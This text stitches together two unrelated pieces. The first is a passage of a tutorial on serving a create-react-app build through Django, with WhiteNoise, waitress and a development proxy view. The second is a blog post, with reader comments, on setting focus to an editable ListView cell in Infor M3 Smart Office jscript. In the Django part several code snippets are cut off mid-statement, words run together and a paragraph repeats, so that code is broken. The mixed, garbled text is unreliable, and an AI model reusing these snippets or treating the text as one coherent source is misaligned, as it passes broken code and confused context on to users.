executing pipenv shell DJANGO_ENV=development ./manage.py migrate DJANGO_ENV=development ./manage.py runserver Open in a browser to confirm that everything is working. React Start another shell, go to the root of the code repository and bootstrap the frontend: npx create-react-app frontend cd frontend Start the development server: # in the frontend directory yarn start opens automatically in a browser. Starting point Django and React development servers are now running on and but they don’t know anything about each other. The source tree contains: . ├── backend │ ├── Pipfile │ ├── Pipfile.lock │ ├── manage.py │ └── todolist │ ├── __init__.py │ ├── settings.py │ ├── urls.py │ └── wsgi.py └── frontend ├── README.md ├── package.json registerServiceWorker.js └── yarn.lock You can confirm this by running tree -I node_modules. Running yarn build in the frontend directory adds: . └── frontend └──.a3b22bcc.js │ └── main.a3b22bcc.js.map └── media └── logo.5d5d9eef.svg Production setup Let’s start with the configuration for running the app in production. Many developers would think about their development setup first. However, production has more constraints than development, notably security and performance. As a consequence, I prefer starting with the production setup and then building a development setup that provides adequate dev / prod parity. Serving HTML In the “hybrid app” model, Django is in charge of serving HTML pages. Let’s add a view that renders the index.html generated by create-react-app with the Django template engine.³ A catchall URL pattern routes any unrecognized URL with that view. Then the frontend URL router takes over and renders the appropriate page on the client side. Configure the template engine: # backend/todolist/settings.py TEMPLATES = [ { 'DIRS': [os.path.join(FRONTEND_DIR, 'build')], ..., }, ] Create the view in a new module: # backend/todolist/views.pyfrom django.views.generic import TemplateViewcatchall = TemplateView.as_view(template_name='index.html') Add a catchall URL pattern to the URLconf: # backend/todolist/urls.pyfrom django.contrib import admin from django.urls import path, re_pathfrom . import viewsurlpatterns = [ path('admin/', admin.site.urls), re_path(r'', views.catchall), ] Build the frontend: # in the frontend directory yarn build Install waitress, a production WSGI server, and start it locally:⁴ # in the backend directory, after executing pipenv shell pipenv install waitress waitress-serve todolist.wsgi:application At this point, you can access the HTML page generated by create-react-app and served by Django at. The page title displayed in the browser tab says “React App”, which confirms that we’re getting the intended HTML page. However, the page is blank because loading the CSS and JS failed. Let’s fix that. Serving static files The “hybrid app” model allows us to take advantage of the staticfiles contrib app and its ecosystem. I find it convenient to serve static files with WhiteNoise and cache them with a CDN for performance. The changes described below: - Configure django.contrib.staticfiles and WhiteNoise; - Declare that frontend/build/static/contains static files; - Serve them at /static/where create-react-app expects them;⁵ - Serve the few other files in the frontend/build/directory at the server root.⁶ # backend/todolist/settings.py INSTALLED_APPS = [ ..., # before django.contrib.staticfiles 'whitenoise.runserver_nostatic', ... ] MIDDLEWARE = [ ..., # just after django.middleware.security.SecurityMiddleware 'whitenoise.middleware.WhiteNoiseMiddleware', ..., ] STATICFILES_DIRS = [os.path.join(FRONTEND_DIR, 'build', 'static')] STATICFILES_STORAGE = ( 'whitenoise.storage.CompressedManifestStaticFilesStorage') STATIC_ROOT = os.path.join(BACKEND_DIR, 'static') STATIC_URL = '/static/' # already declared in the default settings WHITENOISE_ROOT = os.path.join(FRONTEND_DIR, 'build', 'root') This setup requires moving the files to serve at the server root in a root subdirectory. That’s everything in frontend/build except index.html and static. # in the frontend directory cd build mkdir root mv *.ico *.js *.json root cd .. Stop the WSGI server, install WhiteNoise, collect static files, and restart the server:⁷ # in the backend directory, after executing pipenv shell pipenv install whitenoise ./manage.py collectstatic waitress-serve todolist.wsgi:application Now, if you refresh the page at, the create-react-app welcome page loads. Success! Also, the browser tab displays the React icon, which means that serving files like favicon.ico from the server root works. Deploying This setup is compatible with any method for deploying Django to production, provided the server that builds the application prior to deploying it is able to build the frontend and the backend. This boils down to installing Node.js and yarn. A complete build script for the application looks like: cd frontend# 1. Build the frontend yarn build# 2. Move files at the build root inside a root subdirectory mkdir -p build/root for file in $(ls build | grep -E -v '^(index\.html|static|root)$'); do mv "build/$file" build/root; donecd ..cd backendpipenv shell# 3. Build the backend ./manage.py collectstatic --no-inputcd .. Development setup Now that we’re happy with the production setup, let’s build the development setup. The challenge is to optimize dev / prod parity while preserving all features of the development servers. Remove all build artifacts to make sure we don’t accidentally rely on them: # in the backend directory rm -rf static# in the frontend directory rm -rf build If the Django and React development servers aren’t running anymore, start them again with: # in the backend directory, after executing pipenv shell DJANGO_ENV=development ./manage.py runserver# in the frontend directory yarn start Serving HTML In production, we’re loading frontend/build/index.html as a template. In development, it’s available at. It would be possible to build a Django template loader that loads templates from an URL. That would be optimal in terms of dev / prod parity but I don’t think it’s worth the complexity. Instead I’m just going to write an alternative catchall view that proxies requests for index.html to the React development server. Proxying is more appropriate than redirecting: redirecting could change the behavior of the browser and introduce significant differences between dev and prod. Install Requests: # in the backend directory pipenv install requests Change the views module to: #) content = engines['django'].from_string(response.text).render() return http.HttpResponse(content)catchall_prod = TemplateView.as_view(template_name='index.html')catchall = catchall_dev if settings.DEBUG else catchall_prod I’m keeping the original implementation in production because it benefits from Django’s caching of compiled templates. Refresh: while the page is blank, the page title says “React App”, which is good. However, there’s a stack trace and a HTTP 500 error in the logs of runserver: "GET /static/js/bundle.js HTTP/1.1" 500. Oops, our catchall view is also receiving requests for static files and it crashes when it attempts to compile them as Django templates! That was our next step anyway, so let’s improve catchall_dev. Serving static files Here’s a version that runs only HTML responses through Django’s template engine. In addition, it avoids buffering static assets in memory. Development builds of the frontend can grow very large because they aren’t optimized for file size like production builds. Using the streaming APIs in requests and Django makes a noticeable difference. #, stream=True) content_type = response.headers.get('Content-Type')if Refresh: the application loads. Try modifying source files in the frontend. Autoreload works. Hurray! Optimizing autoreload At this point, there’s still a couple errors in the logs of runserver: "GET /sockjs-node/nnn/xxxxxxxx/websocket HTTP/1.1" 400: our proxy doesn’t support WebSocket connections; "POST /sockjs-node/nnn/xxxxxxxx/xhr_streaming?t=ttttttttttttt HTTP/1.1" 403: our proxy rejects POST requests because they don’t account for Django’s CSRF protection. SockJS falls back to Server-Sent Events to wait for autoreload events, as the following line in the logs shows: "GET /sockjs-node/nnn/xxxxxxxx/eventsource HTTP/1.1" 200. Server-Sent Events happen to be supported as a side effect of the streaming optimization. Can we avoid these errors? The question of dev / prod parity no longer matters here because there’s no autoreload in production. We can easily add support for POST requests and fix the second error by disabling CSRF protection for the catchall_dev view⁸ and proxying the HTTP method properly. Unfortunately there’s no trivial way to support WebSocket connections and fix the first error: - proxying them would require setting up Django Channels and writing quite a bit of code; - redirecting them doesn’t work because browsers don’t follow redirects on WebSocket connections; - routing them to the create-react-app dev server isn’t possible at the time of writing; that’s an open issue. For lack of a better solution, we can detect WebSocket requests and return a HTTP 501 Not Implemented error code. An error will still be displayed in the console of the web browser and SockJS will fall back to a less efficient mechanism, XHR Streaming, that keeps a Python thread busy. Here’s the final version: # backend/todolist/views.pyimport requests from django import http from django.conf import settings from django.template import engines from django.views.decorators.csrf import csrf_exempt from django.views.generic import TemplateView@csrf_exempt def catchall_dev(request, upstream=''): """ Proxy HTTP requests to the frontend dev server in development.The implementation is very basic e.g. it doesn't handle HTTP headers.""" upstream_url = upstream + request.path method = request.META['REQUEST_METHOD'].lower() response = getattr(requests, method)(upstream_url, stream=True) content_type = response.headers.get('Content-Type')if request.META.get('HTTP_UPGRADE', '').lower() == 'websocket': return http.HttpResponse( content="WebSocket connections aren't supported", status=501, reason="Not Implemented" )elif And we’re done! I didn’t explain all the design choices, so you may be wondering… Why this design? The setup I described takes advantage of features available in create-react-app and django.contrib.staticfiles to optimize page load performance and dev / prod parity with very little code and without introducing any additional dependencies. Caching Optimizing how browsers cache static assets is a performance-critical requirement. The most reliable solution consists in: - Inserting a hash of the contents of each file in the name of the file; - Telling the browser that it can cache static files forever. If the contents of a file changes, then its name changes and the browser loads the new version. In practice this is more complicated than hashing and renaming files. For example, when CSS references an image, inserting a hash in the name of the image changes the contents of the CSS, which changes its hash. Implementing this behavior involves parsing static assets and understanding dependencies. Django is able to parse and to modify CSS to handle dependencies. This is implemented in in ManifestStaticFilesStorage, which WhiteNoise’s CompressedManifestStaticFilesStorage builds upon. Code splitting Delivering the application gradually with code splitting is another performance-critical requirement. When code splitting is enabled, a JS loader downloads chunks that define modules and imports them as needed. This is a fairly new requirement: code splitting wasn’t mainstream until two years ago. Django is unable to parse JS and understand dependencies between JS files. For this reason, the bundler needs to be responsible for inserting hashes in file names.⁹ Generally speaking, since the bundler is responsible for creating an optimized build of frontend assets, it makes sense to let it take care of inserting hashes in file names. Putting it all together Regardless of which system performs the hashing, a mapping from original file names to hashed file names is needed in order to substitute the hashed file name automatically whenever the developer references a static asset by its original file name. For example, main.js must be replaced with main.a3b22bcc.js. The crux of the issue is to transmit this mapping from the bundler, which creates it when it builds the frontend, to the backend, which needs it to reference static files in HTML pages. In our setup, the mapping is already applied in frontend/build/index.html when Django loads it as a HTML template, so the backend doesn’t need to do anything. An alternative solution involves dumping the mapping in a JSON file with a webpack plugin, then loading it and applying it with a Django storage engine. webpack-bundle-tracker and django-webpack-loader implement this. One more thing! If you’ve been following closely, you noticed that our setup hashes frontend assets twice: webpack hashes them during yarn build and Django hashes them again during ./manage.py collectstatic. This produces files such as backend/static/js/main.a3b22bcc.5c290d7ff561.js. These double-hashed files are never referenced. However, generating them makes ./manage.py collectstatic a bit slower than it could be, especially on large apps. It’s possible to optimize this by subclassing CompressedManifestStaticFilesStorage, if you accept relying on private APIs. Since I know you’re going to ask, here’s an implementation. It’s a fun hack and it works for me. Don’t shout at me it if breaks :-) # todolist/storage.py import collections import re from django.contrib.staticfiles.storage import ( ManifestStaticFilesStorage) from whitenoise.storage import ( CompressedStaticFilesMixin, HelpfulExceptionMixin) class SkipHashedFilesMixin: _already_hashed_pattern = re.compile(r'\.[0-9a-f]{8}\.') def is_already_hashed(self, path): """ Determine if a file is already hashed by webpack. The current implementation is quite lax. Adapt as needed. """ return self._already_hashed_pattern.search(path) def post_process(self, paths, dry_run=False, **options): """ Skip files already hashed by webpack. """ if dry_run: return unhashed_paths = collections.OrderedDict() for path, path_info in paths.items(): if self.is_already_hashed(path): yield path, None, False else: unhashed_paths[path] = path_info yield from super().post_process( unhashed_paths, dry_run=dry_run, **options) def stored_name(self, name): if self.is_already_hashed(name): return name else: return super().stored_name(name) class StaticFilesStorage( HelpfulExceptionMixin, CompressedStaticFilesMixin, SkipHashedFilesMixin, ManifestStaticFilesStorage): """ Similar to whitenoise.storage.CompressedManifestStaticFilesStorage. Add a mixin to avoid hashing files that are already hashed by webpack. """ After you create this file, enable the storage engine with: STATICFILES_STORAGE = 'todolist.storage.StaticFilesStorage' After you create this file, enable the storage class with: STATICFILES_STORAGE = 'todolist.storage.StaticFilesStorage' Footnotes - Implementing the app is left as an exercise for the reader. There are blog posts about building todo list apps on the Internet. - I will be using pipenv and yarn. It’s a matter of personal preference. You can achieve the same result with virtualenv + pip and npm instead. - This makes it possible inject data into the page, if needed, by using Django template syntax in index.html. - I prefer waitress over gunicorn as a zero-configuration, secure WSGI server. - There are many other good solutions; which one you’re choosing doesn’t matter much, as long as you tell create-react-app where the frontend is hosted. - If you’re putting many files in create-react-app’s publicfolder, which the documentation recommends against, this setup will be inefficient. - Unlike ./manage.py runserver, waitress-servedoesn’t include an auto-reloader. It must be restarted manually to take code changes into account. - I believe that it’s safe to disable CSRF protection on the catchall_devview because requests are forwarded to the React development server which, at first sight, doesn’t have any server-side state such as a database that an attacker could try to alter. I didn’t investigate further than this. If you’re concerned, perform your own due diligence. - Look for hashin filename patterns in the production webpack configuration of create-react-app if you’re curious. Originally published at fractalideas.com.
https://medium.com/fractal-ideas/making-react-and-django-play-well-together-the-hybrid-app-model-215991793cf6
CC-MAIN-2020-24
refinedweb
2,945
50.23
Through many years of enterprise level software development and consulting, I became critically aware of the importance of good source code documentation, and several years ago when I began working with the first release of Visual Studio .NET beta 1 and found C# provided built-in support for inline XML code documentation, I was thrilled. After forming my own professional services consulting company, it was even more important to me that my customers be able to support, maintain and extend any software that my company produces on their behalf, and solid, thorough source documentation is one of the steps that can be taken to assist in achieving this. In all releases of Visual Studio .NET, only C# offers built-in support for inline XML code documentation; however, there are several free and third party add-ins that can be obtained to implement the same inline source XML documentation currently offered by C#.NET in C++, VB.NET and J#. The good news for you non-C# developers is that Microsoft has included the same inline XML code documentation support for all .NET languages in Visual Studio .NET 2005. Although Visual Studio .NET provides a built-in facility to produce code documentation reports, I prefer to use the open source NDoc tool, so I will not go into detail about how to produce .htm reports using Visual Studio, but I will demonstrate how to produce integrated, searchable and indexed source documentation for your source by using C#, Visual Studio .NET 2003 and NDoc. NDoc does not support version 2.0 or newer. To use the details in this article and produce source documentation from your XML documentation in your source files, you can use the free tool that can be downloaded from. This is the only way authors get any type of credit for their work they freely share with everyone. It's sad to see articles that have helped over 100,000 people and fewer than 200 bother to vote or provide a rating. There are three types of comment identifiers used to document C# source code: // Comment /* Comment */ /// // This is a single line remark or comment /* * This is line 1 of a comment block * This is line 2 of the comment block */ /// <summary> /// This is a sample summary comment /// using the 'summary' xml tag. /// </summary> public void GetLoginAttempts( string userId ) { … } C# offers several XML tags that can be placed directly within your source files to document the code, and Microsoft documents these tags very nicely in Visual Studio .NET help files. Once the developer has documented her source using the XML tags, she can use NDoc to produce integrated .chm files that contain the source documentation. Although the description above and in the article may use the term 'comment', the XML tags are used to produce external source documentation. This differs from traditional code comments in that the realized documentation can be distributed as API (Application Programmer's Interface) documentation. Before discussing NDoc and how to produce .chm files, let's first examine how to instrument C# source code with the XML tags and discuss some of the available XML documentation tags in more detail. The XML documentation tags are used to document classes and their high level characteristics such as constructors, finalizers, methods, properties, fields, delegates, enums, events and other characteristics. Visual Studio .NET recognizes the /// marker and will insert common, appropriate tags for the developer when instructed to do so. The developer instructs Visual Studio .NET to insert these tags by typing the /// marker directly above the target characteristic. The common tags Visual Studio will insert are: summary, param (if appropriate) and returns (if appropriate). summary param returns Figure 1 illustrates a standard method before and after the developer instructs Visual Studio to insert the XML tags by typing /// directly above the target characteristic. // Figure 1 // Before: public bool StringIsValid( string validateMe ) { … } // After the developer types 3 slashes (///) // above the method signature: /// <summary> /// /// </summary> /// <param name="validateMe"></param> /// <returns></returns> public bool StringIsValid( string validateMe ) { … } Now that you know how to prompt Visual Studio .NET to insert the XML tags, let's discuss some of the common tags and their usage. Since the tags are XML, they need to be 'well formed'. At least in the sense you need to be sure to provide the proper closing marker and use single or double quotes as required. In the table below, when indications are given that clicking on links will show or display other information, I am referring to links in the produced .chm documentation files not within Visual Studio .NET. Conversely, when I mention IntelliSense or the client, the information will be displayed in Visual Studio .NET. Please note, I have not covered every XML tag supported by C# and Visual Studio .NET in this article, but rather the most commonly used tags. <summary>Your summary</summary> <param name='name'>Description.</param> <returns>Description.</returns> remarks <remarks>Your remarks.</remarks> para <para>Your text.</para> c <c>Your code sample.</c> paramref <paramref name="name"/> <param name='myParm'> </param> <remarks> <paramref name=”myParm”/> <c> </c> </remarks> see <see cref="member"/> <returns> <see cref=”System.String”/> </returns> String exception <exception cref="member"> <exception cref="ArgumentException"> <paramref name="firstName"/> </exception> <exception> code <code>Your code sample.</code> <example> example <example>Your example.</example> Now that you're armed with the most common tags, let's discuss the source documentation. Documenting source code should be a standard part of the development process. If you get in the habit of documenting your source as you write it, you will find that you can produce fully documented code much faster than if you write code and try and go back and instrument it with documentation at a later time. I have found, if I document the code as I write it, it takes about 50% less time to document it than if I try and go back and document it later. If you are not used to fully documenting your source, you will have to get used to the fact that your .cs files will be longer which will cause you to scroll more; however, one trick that I've found is to make use of .NET's region functionality to reduce this side effect. region Although I will not address it in this article, you can write your XML documentation in an external file and use the <include> tag to link the external file to your source. You can produce the same documentation whether your comments are in the actual source .cs files or in an 'include' file. <include> I try to ensure I provide documentation for all types and their members in my source. Although the particular implementation dictates the tags used, I try to provide at least the following XML tags for the related types (I document all members regardless of their scope or access modifier): Summary Remarks Example Param Returns Exception Value <summary> Figure 2 illustrates a short class documented with all the XML tags that have been discussed in this article. // Figure 2 namespace Mike.Elliott.Articles.XML.Documentation { using System; /// <summary> /// The <c>DocumentationSample</c> type /// demonstrates code comments. /// </summary> /// <remarks> /// <para> /// The <c>DocumentationSample</c> type /// provides no real functionality; /// however, it does provide examples of /// using the most common, built in /// <c>C#</c> xml documentation tags. /// </para> /// <para> /// <c>DocumentationSample</c> types are not /// safe for concurrent access by /// multiple threads. /// </para> /// </remarks> public.MyMethod( “someString” ); /// </code> /// </example> public DocumentationSample() { … } /// <summary>Causes something happen.</summary> /// <param name="someValue"> /// A <see cref="String"/> type representing a; } } Now let's break down the source. Let's look at the code snippets and the way the XML documentation is used. Each XML tag listed in the tag usage table provided earlier in this article is covered. Figure 3 illustrates the use of <summary>, <c>, <remarks> and <para> XML documentation tags: <para> // Figure 3 /// > public class DocumentationSample { … } Figure 4 illustrates the use of <summary>, <c>, <example> and <code> XML documentation tags: <code> // Figure 4 /// > public DocumentationSample() { … } Figure 5 illustrates the use of <summary>, <param>, <see>, <exception>, <paramref>, <c> and <returns> XML documentation tags: <param> <see> <paramref> // Figure 5 /// <summary>Causes something happen.</summary> /// <param name="someValue">A <see cref="String"/> /// type representing some; } Once your source is documented, you need to generate the XML documentation file used to produce the Visual Studio .NET documentation reports or NDoc help files. Visual Studio .NET parses the .cs files to produce the XML documentation file; however, there are a couple of configurations and steps we need to take to make this happen. We must tell Visual Studio to produce the XML file, what to name the file, and where to create the file. To do this, in the Solution Explorer, right click the project and select Properties. This will bring up the project's property pages (see figure 6). In the project's property pages, select the Build option under the Configuration Properties section. There are two properties you need to be concerned about on this page. First is the "Output Path" property which tells the compiler where to write the XML documentation file (I typically leave the path set to the bin/Debug directory because it makes using NDoc a little easier). Next, is the "XML Documentation File" property which will be the name of your XML documentation file (see figure 7). Click Apply and then OK to close the project's property pages. The last step in producing the XML documentation file is to build the project. Once you build the project, navigate to the directory you set as the "Output Path" for the documentation file, and you will see the .xml file (in my case the bin/Debug directory). If you open the XML file in a browser or Notepad, you will see that the XML documentation compiler has stripped out the XML documentation to produce the file. This also means that you can create your own XML stylesheets (XSLT) to format the documentation any way you want. <?xml version="1.0"?> <doc> <assembly> <name>DocumentationSample</name> </assembly> <member name="T:Mike.Elliott.Articles.XML. Documentation.DocumentationSample"> > </member> <member name="M:Mike.Elliott.Articles.XML. Documentation.DocumentationSample.#ctor"> > </member> <member name="M:Mike.Elliott.Articles.XML. Documentation.DocumentationSample.MyMethod(System.String)"> <summary>Causes to happen.</summary> <param name="someValue"> A <see cref="T:System.String"/> type representing some value. </param> <exception cref="T:System.ArgumentNullException"> if <paramref name="someValue"/> is <c>null</c>. </exception> <exception cref="T:System.ArgumentException"> if <paramref name="someValue"/> is <c>empty</c>. </exception> <returns><paramref name="someValue"/> as passed in.</returns> </member> </doc> Now that you have the XML documentation file, you are ready to build the actual help files or API documentation. For this task, we are going to use NDoc. NDoc is an extensible open source code documentation generation tool for .NET developers. You can download a free fully functional copy of NDoc from SourceForge.net or NDoc (many thanks to SourceForge and the developers who contributed to the NDoc utility). Once NDoc is installed, open up the GUI so that we can build our long awaited help files. There are numerous configurations you can set within NDoc that dictate the content and format of the help files. I'll only cover a few here, but the contributing authors of NDoc did a wonderful job of documenting the options. When you click in one of the property boxes, a description of the property is displayed at the bottom of the GUI (see figure 8). First, we need to add the .NET assembly(s) we want to include in the documentation. Notice we have the option to include as many assemblies as we want. This gives you the ability to create a fully integrated help file system for your entire system or organization. If your organization requires all C# development to be completely documented with the XML tags, you could add the production of the integrated help files to your standard build process. Remember, earlier in the article I indicated that I typically leave the Visual Studio project's "Output Path" set to bin\Debug because it made working with NDoc a little easier? Click the Add button on NDoc and navigate to the Assembly file name and select the .exe or .dll assembly (see figure 9). If you leave the "Output Path" pointing to bin\Debug, NDoc will automatically find the XML documentation file and populate the XML Doc Filename textbox. If you have changed the "Output Path", navigate to the XML documentation file to set the XML Doc Filename, and click OK. Without going too deep into the NDoc properties, when validating the contents of your help files, one helpful thing you can do is navigate NDoc's UI (user interface) to the "Show Missing Documentation" section and set each property to true. This will cause the help files produced by NDoc to mark the missing documentation in red to indicate that the documentation type is missing. When you are satisfied with the documentation, you can turn off these properties (see figure 10). true OK, let's set a few properties and build our help files. The first property we want to set is the documentation type. I really like the MSDN format, so we'll accept it as the default. Next, under the "Documentation Main Settings" area, we need to change the OutputDirectory. I generally create a Doc directory under the source code project folder, and point NDoc to this location (note: NDoc will produce several files). OutputDirectory Lastly, change DocumentInternals and DocumentPrivates, under the Visibility section, to true. DocumentInternals DocumentPrivates That's it for the basic properties, so all we have to do now is build the help files and take a look at them. To build the files, click the build icon on the toolbar or select Build from the Documentation menu. Once NDoc has completed the build process, open the help files by clicking View Icon on the toolbar or select View from the Documentation menu (see figure 11). Additionally, I would like to discuss how to document the namespaces to which your classes belong. Visual Studio .NET and C# do not provide a mechanism to document namespaces because namespaces are simple, logical containers for developers to organize and structure their code. In other words, you cannot document namespaces with the inline XML comment tags and expect them to be properly parsed into your .xml documentation file. There is, however, an easy way to provide a summary level description for namespaces through NDoc's GUI. If you noticed in figure 10 (two images above), you will see the Namespace Summaries button located on NDoc's GUI. When you click this button, a dialog will appear with a drop-down box containing each namespace NDoc found within your code (see figure 12). Here are the steps to add a namespace summary to your documentation: One of the neat things about the realized documentation is they are HTML files. Think about that for a minute, this means you can use traditional HTML tags within your XML comments to achieve custom formatting. In fact, the XML tags listed in this article simply map to HTML transformations or CSS classes. For example, when you create a bullet list in your XML comments, the result produced by NDoc (or Visual Studio .NET's HTML reports) is the typical HTML <ul> / <li> tag pair. <ul> <li> //XML Comments in the source code /// <remarks> /// <list type="bullet"> /// <item><b>Bold</b>, <i>Italic</i>, <b><i>Bold-Italic</i></b></item> /// <item>Superscript - 1<sup>st</sup></item> /// <item>Subscript - 2<sub>nd</sub></item> /// </list> /// </remarks> public void HTMLCommentMethod() { ... } <ul type="disc"> <li><b>Bold</b>, <i>Italic</i>, <b><i>Bold-Italic</i></b></li> <li>Superscript - 1<sup>st</sup></li> <li>Subscript - 2<sub>nd</sub></li> </ul> I'm sure you can see how easy it is to add Bold, Italic and other standard HTML formatting to your documentation, and you can see the various uses for it. Since the output is simply HTML files, there is nothing preventing us from using anchors with links to external sites or pages, adding inline JavaScript to open new windows or even "pop up" alerts. The following code illustrates a bullet list with Bold, Italic, an Anchor (<a>) whose onclick pops up a JavaScript alert, and an Anchor (<a>) whose onclick opens a new window that navigates to a specific URL. onclick /// <summary> /// This method demonstrates comments using <c>HTML</c> tags /// within the <c>XML</c> comments. /// </summary> /// <remarks> /// <c>HTML tag examples:</c> /// <list type="bullet"> /// <item><b>Bold</b>, <i>Italic</i>, <b><i>Bold-Italic</i></b></item> /// <item>Superscript - 1<sup>st</sup></item> /// <item>Subscript - 2<sub>nd</sub></item> /// <item>Javascript Alert - <a href='#' ///Alert</a></item> /// <item>New Window - /// <a href="#" onclick='javascript: window.open( /// "" );'> /// New Window</a> /// </item> /// </list> /// <hr> /// Something else /// </remarks> public void HTMLCommentMethod() { ... } Figure 13 displays the NDoc documentation for the above method. One valuable use for anchors pointing to external sites would be to document research found on the internet that solved certain problems within your project or code. As an example, you could add a link to a site that documents a fix you implemented for a known security issue. To wrap up the article, I want to point out a few things that will make the C# XML documentation and NDoc integration really neat. A couple of things I particularly like about the produced help files are that they are in a standard .chm format and they provide the standard contents, index and search capability. Also, notice that, if you had selected MSDN as the documentation type, your help files will be integrated with the .NET Framework's help files. Notice in figure 11, the DocumentationSample class derives from System.Object, and if you click the System.Object link, you will be taken to the .NET Framework's System.Object documentation (if you had installed the MSDN help files during your Visual Studio .NET installation). DocumentationSample System.Object Have you ever downloaded an open source .NET assembly that provided poor or no documentation? If the assembly was written in C#, and the developer used XML documentation tags, you can produce the API documentation yourself (I did this with the Microsoft.Web.UI.WebControls assembly which proved to be very helpful). Microsoft.Web.UI.WebControls In Visual Studio .NET, once you configure your .NET project to produce an XML documentation file and if you build the project, you may see several warnings informing you of undocumented characteristics. Many a times you will have to use Rebuild instead of Build to get the XML file updated properly. Once I have validated the documentation, I will typically save the NDoc project and add the .ndoc project file to my solution and place it in source control along with the source (note, I only have the .ndoc project file and not all the produced files as they are very easy to recreate). By using the C# inline XML documentation tags and NDoc, you can create comprehensive API documentation for your source. By adding several assemblies to the same NDoc project and integrating with the .NET Framework help files, you can truly produce a professional set of source documentation of which anyone would be proud.
http://www.codeproject.com/Articles/11082/C-and-XML-Source-Code-Documentation?fid=201254&df=90&mpp=10&sort=Position&spc=None&select=3584463&tid=3570962
CC-MAIN-2016-18
refinedweb
3,235
54.12
It’s been longer than I hoped between blog postings – I’ve been tied up with putting in a new firewall and sorting out our fixed lines and mobiles – too many balls in the air at once at the moment to focus on the magical work of jscripts. But an email came in to me whilst I was sleeping this morning – the question was “how do I set the focus on one of the editable cells within a ListView in the Init()?” To be honest, I thought it wasn’t going to be possible – I’ve fought with the bubbling messaging mechanisms of the .Net framework before; projects I have the source code for and it’s been a nightmare, let alone something where I don’t control the raw code. But I figured I’d give it a shot. After a couple of hours of trying I was writing a fairly long and detailed email explaining how I had failed miserably when I had an epiphany. It was almost like one of those dramatic House moments where someone says something which provides the association you need to solution the illness…errr…problem. First things first…the program we are talking about is MWS422 and we want to set the focus on the “To loc” cell. First things first, I wanted to determine what exactly the cell was – if it was simply a TextBox then it wouldn’t be too much of an issue, we could just issue a .Focus() against the TextBox when we got hold of the control. So, I wrote some code which iterated through each of the items in the first row of the ListView. if(lvListView.Items.Count >= 1) { var lviItem : ListRow =()); } } } } Ok, so now we now that we have an EditableCell I took at look in the Object Browser in Visual Studio to see if it was inherited from the TextBox control. Sadly not, that would be way too easy. Interestingly I didn’t really see much of any help which would indicate what this control really is. Perhaps this overlays some control and they subscribe to the PropertyChanged event to determine when things should be changed?? Who knows…? So, the next thing to do was just try calling .Focus() against the EditableCell and well, that didn’t work… Which meant last restore…trawl through the object tree in Visual Studio to see if there was anything that could be related. As luck would have it, I started with the ListControl – I know that there are a lot of helper style functions with this object so… I found these two entries – well actually, I found FocusFirstEditableCell() first and that appeared to set the focus to only the first row in the ListView, not quite enough for me. So with a little bit of playing I discovered that the FocusOnCell() would actually set the focus to the desired cell. FocusOnCell takes a variable called Name, and as luck would have it, the EditableCell has a property called Name. So, the next thing I did was determine the Name of the cell in the fourth column. (well, actually I did this step after I discovered FocusFirstEditableCell() wouldn’t work and before I found out that FocusOnCell() would work but hey!) if(lvListView.Items.Count >= 1) { var lviItem : ListRow = lvListView.Items[0]; if(null != lviItem) { if(null != lviItem.Items) { var ecEditableCell : EditableCell = lviItem.Items[3]; // Display the name of the cell MessageBox.Show(ecEditableCell.Name); } } } I created a button which allowed me to test to ensure that the code was working and it was. Now as I mentioned previously, I’ve had issues playing around with the focus of cells…and this took 7 iterations before I had the epiphany, all failed miserably, at best I could select the Row. It was complicated by having to copy the scripts to the server to test, we can’t just run it from the LSO jscript editor. I tried subscribing to the changing of the selecteditem in the ListView as an example, but this didn’t work until it occurred to me, subscribe to the focus event on the ListView and fire our FocusOnCell() – and it worked! :-). Anyways, code is below. Bear in mind that this is Proof of Concept, so if you loose focus and then reset the focus on the ListView the first row will be selected so you may want to modify a little. import System; import System.Windows; import System.Windows.Controls; import MForms; import Mango.UI.Services.Lists; package MForms.JScript { class MWS422_SetFocusInListView_009 { var gcController; var gbtnShowName : Button; // this is the button that we will be adding var giChangeCount : int = 0; public function Init(element: Object, args: Object, controller : Object, debug : Object) { var content : Object = controller.RenderEngine.Content; var lvListView : ListView = controller.RenderEngine.ListControl.ListView; // TODO Add your code here gcController = controller; // add a button to the panel for testing gbtnShowName = new Button(); gbtnShowName.Content = "Test Focus"; Grid.SetColumnSpan(gbtnShowName, 15); Grid.SetColumn(gbtnShowName, 1); Grid.SetRow(gbtnShowName, 22); content.Children.Add(gbtnShowName); gbtnShowName.add_Click(OnShowNameClicked); lvListView.add_GotFocus(OnGotFocus); // this will set the focus to the first item in the listview controller.RenderEngine.ListControl.FocusFirstEditableCell(); // this would set the focus to the cell called R1C4 gcController.RenderEngine.ListControl.FocusOnCell("R1C4"); // if(lvListView.Items.Count >= 1) // { // var lviItem : ListRow = lvListView.Items[0];//lvListView.ItemContainerGenerator.ContainerFromItem()); // } // // In my case, the cell we are looking at is in the forth column (I know from running the code above that it is an EditableCell) // var ecEditableCell : EditableCell = lviItem.Items[3]; // // Display the name of the cell // MessageBox.Show(ecEditableCell.Name); // } // } // } } // this will actually do the setting of the focus function OnShowNameClicked"); } function OnGotFocus"); } } } Happy Coding! While try to copy a B Panel list view (var newItems = new String[row.Items.length]; row.Items.CopyTo(newItems, 0) ) I got an error because the B Panel I was copying had editable cells. How can I get the CopyTo method to work with editable cells? Hi Jean, you’ll probably need to manually loop through copy each entry in the array rather than using the CopyTo method. Cheers, Scott How can I readonly m3 listview column.. program name is m3 supplier invoice and column name is Inv Qty . please help me. Hi Priyantha, specifically which program? APS100? What panel? Depending on the program you can set the security so the users can only go in to Display mode. There are a variety of methods – you may be able to cancel any changes that a user makes, you may be able to determine the column and then loop through the lines and set the TextBox in the ListView to read only. It really depends on the details of what you want to achieve and which program. Cheers, Scott dear Scott, Program name is APS360 Panel Name : B Column Name is Inv Qty. I want to readonly Inv Qty column . I have tryed following codes InstanceController con = (InstanceController)controller; Object content = con.RenderEngine.Content; // TODO Add your code here MForms.ListControl listControl = con.RenderEngine.ListControl; System.Windows.Controls.ListView listView = con.RenderEngine.ListViewControl; ItemCollection rows = null; rows = listView.Items; foreach (var item in rows) { int column1 = listControl.GetColumnIndexByName(“IVQA”); EditableCell cell = item as EditableCell; } but there is no any property to readonly cell . I want to readonly entire column. i tryed it with Snoop 2.8.0 . it is showed it as a Textbox . but i unable to access it using tree hirarchy . please help me . Thank you Priyantha You could try asking over on the is there is a more ‘supported’ method. Otherwise, you’re going to need to get the controls in the ListView and work your way through the visual tree to get to the TextBox and set that to read only. StackOverflow has an example of how to do this, however you’ll need to convert that in to jscript. I can imagine that this could break with Smart Office version updates. You may find that you can cancel the commit events using the Requesting event and cancelling the 